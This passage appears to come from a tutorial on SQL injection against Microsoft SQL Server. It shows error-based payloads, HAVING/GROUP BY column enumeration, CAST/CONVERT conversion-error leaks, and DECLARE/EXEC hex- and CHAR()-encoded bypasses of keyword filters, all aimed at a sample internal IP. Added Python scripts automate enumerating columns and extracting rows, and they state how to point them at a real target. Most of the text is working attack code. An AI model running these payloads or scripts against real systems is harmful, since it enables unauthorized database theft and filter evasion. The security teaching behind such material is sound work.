    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 and 1=(select top 1 table_name from information_schema.tables);--</span></code></span></span></p></li>
   </ol>

To learn the name of the table the page queries and its columns, we can also use HAVING 1=1 followed by GROUP BY probing:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 having 1=1</span></code></span></span></p></li>
   </ol>

This leaks the current table name and its first column: with `select *` and no GROUP BY, SQL Server complains that the first column of the select list is neither aggregated nor grouped, and names it as table.column.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">http</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">:</span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//192.168.130.137/1.aspx?id=1 group by info.id,info.name having 1=1</span></code></span></span></p></li>
   </ol>

Each request leaks the next column, which is appended to the GROUP BY list for the following request; when the query stops erroring, every column of the table has been enumerated.
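As an added example (not part of the original article), the following Python automates the loop just described: it sends `having 1=1`, pulls the table and column name out of SQL Server message 8120 (`Column 'info.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.`), appends that column to the GROUP BY list and repeats until the page stops erroring. The `fake_oracle` stand-in, the `info` table and its three columns are constructed for offline use; against a real target, replace `fake_oracle` with a function that fetches the URL and returns the error text shown in the response.

```python
import re

# SQL Server message 8120, the error HAVING 1=1 / GROUP BY probing relies on.
# It names the first select-list column that is missing from the GROUP BY clause.
MSG_8120 = re.compile(
    r"Column '(?P<table>[^']+)\.(?P<column>[^'.]+)' is invalid in the select list "
    r"because it is not contained in either an aggregate function or the GROUP BY clause"
)


def parse_group_by_error(error_text):
    """Return (table, column) leaked by a message 8120, or None if absent."""
    m = MSG_8120.search(error_text)
    if m is None:
        return None
    return m.group("table"), m.group("column")


def enumerate_columns(oracle, base_url, max_columns=64):
    """Leak the table name and all column names through the HAVING/GROUP BY error.

    oracle(url) -> error text from the response, or "" when the page renders normally.
    Request 1 appends `having 1=1`; each later request appends the column just
    leaked to the GROUP BY list, until the query compiles without an error.
    """
    table = None
    columns = []
    for _ in range(max_columns):
        if columns:
            group_by = ",".join(f"{table}.{c}" for c in columns)
            payload = f"{base_url} group by {group_by} having 1=1"
        else:
            payload = f"{base_url} having 1=1"
        leaked = parse_group_by_error(oracle(payload))
        if leaked is None:
            break  # no error: every column is now in the GROUP BY list
        table, column = leaked
        columns.append(column)
    return table, columns


# --- Constructed stand-in for the vulnerable page (hypothetical, not a real server) ---
FAKE_TABLE = "info"
FAKE_COLUMNS = ["id", "name", "password"]


def fake_oracle(url):
    """Mimic SQL Server compiling `select * from info where id=1 <injected>`."""
    m = re.search(r"group by (.+?) having 1=1", url)
    grouped = set()
    if m:
        grouped = {part.split(".", 1)[1] for part in m.group(1).split(",")}
    for col in FAKE_COLUMNS:
        if col not in grouped:
            return (f"Column '{FAKE_TABLE}.{col}' is invalid in the select list because it is "
                    f"not contained in either an aggregate function or the GROUP BY clause.")
    return ""  # query compiled: the page renders normally


if __name__ == "__main__":
    print(enumerate_columns(fake_oracle, "http://192.168.130.137/1.aspx?id=1"))
```

The loop stops on the first response without message 8120, so a WAF that swallows the error page (or an application that hides database errors) ends enumeration early with a partial list; check that the last request really returned the normal page before trusting the result.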

Chapter 5: Basic MSSQL injection workflow

0x00 Introduction

The previous chapter introduced error-based injection. In MSSQL it relies on a failed explicit or implicit type conversion: the server aborts the query and echoes the offending value in the error message. The following are typical implicit conversions (an nvarchar value compared with, or bitwise-ORed with, an int is converted to int first, and a value such as 'dbo' cannot be):

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)></span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">|(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Conversion failed when converting the nvarchar value 'dbo' to data type int.</span></code></span></span></p></li>
   </ol>

Explicit conversion calls a conversion function; the two used most are CAST and CONVERT:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CAST</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> expression AS data_type </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CONVERT</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">data_type</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">length</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)],</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> expression </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">[,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> style</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">])</span></code></span></span></p></li>
   </ol>
   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CAST</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">USER </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">as</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> convert</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
   </ol>
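The examples above leak `user`; extracting a whole column this way means asking for one row per request and parsing the value out of message 245 (`Conversion failed when converting the nvarchar value 'dbo' to data type int.`). The following Python helpers are an added example, not the article's code, that build the three payload shapes shown above and decode the error. Two details the one-liners hide: a `'~'+` marker makes the conversion fail even when the leaked value is all digits (a bare `convert(int,'1234')` succeeds and that row would silently be missed), and values placed in the `not in (...)` exclusion list need their single quotes doubled. The `admin`/`name` table and column and the `~` marker are placeholders chosen here.

```python
import re

# SQL Server message 245, the conversion error that carries the leaked value.
MSG_245 = re.compile(
    r"Conversion failed when converting the (?P<type>n?varchar) value "
    r"'(?P<value>.*)' to data type int",
    re.DOTALL,
)


def sql_quote(value):
    """Embed a value in a T-SQL single-quoted literal (embedded quotes are doubled)."""
    return "'" + value.replace("'", "''") + "'"


def extraction_payload(subquery, mode="convert", marker="~"):
    """Wrap a scalar subquery so SQL Server must convert its text to int and fail.

    mode 'implicit' -> and (<expr>)>0        (comparison with int forces nvarchar->int)
    mode 'cast'     -> and 1=cast(<expr> as int)
    mode 'convert'  -> and 1=convert(int,<expr>)
    The marker is prepended so an all-digit value cannot convert cleanly and be lost.
    The subquery must yield a character value; convert numeric columns to text first.
    """
    expr = f"{sql_quote(marker)}+({subquery})" if marker else f"({subquery})"
    if mode == "implicit":
        return f" and ({expr})>0--"
    if mode == "cast":
        return f" and 1=cast({expr} as int)--"
    if mode == "convert":
        return f" and 1=convert(int,{expr})--"
    raise ValueError(f"unknown mode {mode!r}")


def next_row_subquery(column, table, seen):
    """Scalar subquery returning the first value of `column` not already extracted."""
    if seen:
        exclusion = ",".join(sql_quote(v) for v in seen)
        return f"select top 1 {column} from {table} where {column} not in ({exclusion})"
    return f"select top 1 {column} from {table}"


def parse_leak(error_text, marker="~"):
    """Pull the leaked value out of message 245 and strip the marker; None if no leak."""
    m = MSG_245.search(error_text)
    if m is None:
        return None
    value = m.group("value")
    if marker and value.startswith(marker):
        value = value[len(marker):]
    return value


if __name__ == "__main__":
    # Second-row request after 'administrator' has already been extracted.
    sub = next_row_subquery("name", "admin", ["administrator"])
    print(extraction_payload(sub))
    # Constructed error text as the server would return it for the value 'guest'.
    print(parse_leak("Conversion failed when converting the nvarchar value '~guest' to data type int."))
```

Without an ORDER BY the row that `top 1` returns is whatever the engine picks, but the `not in` exclusion list still guarantees that every distinct value is eventually returned once; when the column stops producing an error the exclusion list holds the whole column.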

0x01 Simple filter bypass

Since the previous chapter already covered simple error-based injection, this section introduces DECLARE. It is the T-SQL statement that declares a local variable (not, strictly, a function), and it is frequently used to get past a WAF that blocks keywords: the blocked statement is stored in the variable as a string and then run with EXEC, so the keywords never appear in the request in plain form. Note that this needs stacked queries (the `;` after `id=1`), which the common MSSQL drivers permit.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> nvarchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2000</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'select convert(int,@@version)'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit 
!important;">exec</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span></code></span></span></p></li>
   </ol>

DECLARE defines the variable, SET assigns its value, and EXEC executes the string the variable holds as dynamic SQL.

The value can also be supplied as a hexadecimal literal or assembled from CHAR() codes, so when single quotes are filtered we encode the statement instead of quoting it:
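An added Python helper (not part of the original article) that produces the encoded forms this section uses and reproduces the hex literal the article shows below. One caveat it makes explicit: a 0x literal assigned to a `varchar` variable is read as single-byte text, but assigned to an `nvarchar` variable it is read as UTF-16LE code units, so the literal must be encoded accordingly or the statement becomes garbage (which is why the hex example below uses `varchar` where the quoted example used `nvarchar`). The variable name `@s` and the length `2000` follow the article; the `nhex` mode is an addition here.

```python
def to_hex_literal(statement, unicode_var=False):
    """Encode a T-SQL statement as a 0x... literal for `set @s=0x...`.

    varchar variable : bytes are the statement's single-byte text.
    nvarchar variable: the binary is reinterpreted as UTF-16LE code units,
                       so the literal must be UTF-16LE-encoded.
    """
    raw = statement.encode("utf-16-le" if unicode_var else "latin-1")
    return "0x" + raw.hex()


def to_char_chain(statement):
    """Encode a statement as CHAR(n)+CHAR(n)+... for when 0x literals are filtered too."""
    return "+".join(f"CHAR({ord(ch)})" for ch in statement)


def declare_exec_payload(statement, var="@s", encoding="hex"):
    """Stacked-query suffix: ;declare @s <type> set @s=<encoded> exec(@s)--

    encoding 'hex'  -> varchar variable, single-byte hex literal
    encoding 'nhex' -> nvarchar variable, UTF-16LE hex literal
    encoding 'char' -> varchar variable, CHAR() concatenation
    """
    if encoding == "hex":
        value, dtype = to_hex_literal(statement), "varchar(2000)"
    elif encoding == "nhex":
        value, dtype = to_hex_literal(statement, unicode_var=True), "nvarchar(2000)"
    elif encoding == "char":
        value, dtype = to_char_chain(statement), "varchar(2000)"
    else:
        raise ValueError(f"unknown encoding {encoding!r}")
    return f";declare {var} {dtype} set {var}={value} exec({var})--"


def decode_hex_literal(literal, unicode_var=False):
    """Reverse of to_hex_literal; handy when reading such payloads out of web logs."""
    raw = bytes.fromhex(literal[2:])
    return raw.decode("utf-16-le" if unicode_var else "latin-1")


if __name__ == "__main__":
    stmt = "select convert(int,@@version)"
    print(declare_exec_payload(stmt))
    print(declare_exec_payload(stmt, encoding="char"))
    print(decode_hex_literal(to_hex_literal(stmt)))
```

`decode_hex_literal` is the defender's half of the same trick: a WAF or log review that only pattern-matches keywords misses the 0x form, but decoding any `set @x=0x...` literal found in request logs recovers the statement that was actually executed.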

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
